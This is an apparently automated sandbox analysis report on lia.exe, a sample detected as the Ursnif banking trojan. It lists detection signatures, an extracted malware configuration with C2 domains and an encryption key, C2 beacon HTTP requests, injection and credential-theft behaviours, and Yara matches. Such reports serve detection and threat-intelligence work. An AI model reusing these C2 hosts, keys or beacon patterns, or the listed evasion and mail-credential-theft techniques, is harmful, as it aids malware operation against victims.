Windows Analysis Report lia.exe

Overview

General Information

Sample Name:	lia.exe
Analysis ID:	551720
MD5:	8b893e03dd1c7ce96df57f92f302dcb1
SHA1:	a7a131ea9f39ebaa195296ebd9b44708bee8264d
SHA256:	dd023f1f2ce682e9db588aa6cb859b6279d5e43f87a9a99da3cd683711736324
Tags:	exegozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Tries to steal Mail credentials (via file / registry access)

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Uses nslookup.exe to query domains

Writes or reads registry keys via WMI

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

Self deletion via cmd delete

Sigma detected: MSHTA Spawning Windows Shell

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Modifies the export address table of user mode modules (user mode EAT hooks)

Writes registry values via WMI

Writes to foreign memory regions

Changes memory attributes in foreign processes to executable or writable

Uses ping.exe to check the status of other devices and networks

Modifies the prolog of user mode functions (user mode inline hooks)

Uses ping.exe to sleep

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Modifies the import address table of user mode modules (user mode IAT hooks)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Queries the installation date of Windows

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Searches for the Microsoft Outlook file path

Drops PE files

Uses a known web browser user agent for HTTP communication

Compiles C# or VB.Net code

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Rundll32 Activity

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Enables debug privileges

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Csc.exe Source File Folder

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://apr.intooltak.com/GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc	Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I	Avira URL Cloud: Label: malware

Found malware configuration

Source: lia.exe

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "qIukMm1AgKEd3dDbi+35d6MWl+UVbpPFMmGiIDJDDgacZEK8jS4/5zs7ubFZ5RKJ14yC3bMOc4/MB7Zet4BsfAXbGBTmAWZXgT7koTnek2QEZiZ20WKgDLTyQy6GTUUxk0Lxr770IDyy/BSk6aJtHlPex8y6K+Zfruo7cnUzrkN8zs1jBevHKQWt6llI/Itko98RJ0R0pmGGdCg3N/wJUyo7XGnNMik7BdDxE//CSyU7CGkS06hh8BE+0pne+Py1DXhCspMJHsvHS9ciS0vyjWH7bqpi3HvZcztPPJEdLRwiwxTsC/ZMMvLH6gW4XsTGYqrbBj5INNDf6kLJCXP5iGV+GsvodMKbUJybGxVS5nY=", "c2_domain": ["apr.intooltak.com", "app.querosityproject.com"], "botnet": "1000", "server": "770", "serpent_key": "BwM3bYGWLcupJ1hC", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Multi AV Scanner detection for submitted file

Source: lia.exe	Virustotal: Detection: 64%			Perma Link
Source: lia.exe	ReversingLabs: Detection: 74%

Antivirus / Scanner detection for submitted sample

Source: lia.exe

Avira: detected

Machine Learning detection for sample

Source: lia.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.lia.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.lia.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00B17479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

1_2_00B17479

Compliance:

Uses 32bit PE files

Source: lia.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source:	Binary string: ntdll.pdb source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.pdb source: powershell.exe, 0000000C.00000002.614202751.000001770375D000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_039E8409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

1_2_039E8409

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_039F2ECF
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_039EB9D4
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_039DE91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	44_2_036BE91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	44_2_036CB9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	44_2_036D2ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49768 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49769 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49769 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49772 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49772 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49856 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49856 -> 185.189.12.123:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Uses nslookup.exe to query domains

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine

Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: global traffic	HTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU

Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000000C.00000003.487223074.000001777B372000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.572331191.0000017700001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp	String found in binary or memory: http://twitter.com/spotifyg
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000016.00000000.543937069.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495631696.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527688751.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: apr.intooltak.com

Source: global traffic	HTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com

Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp

String found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)

Source: unknown

HTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
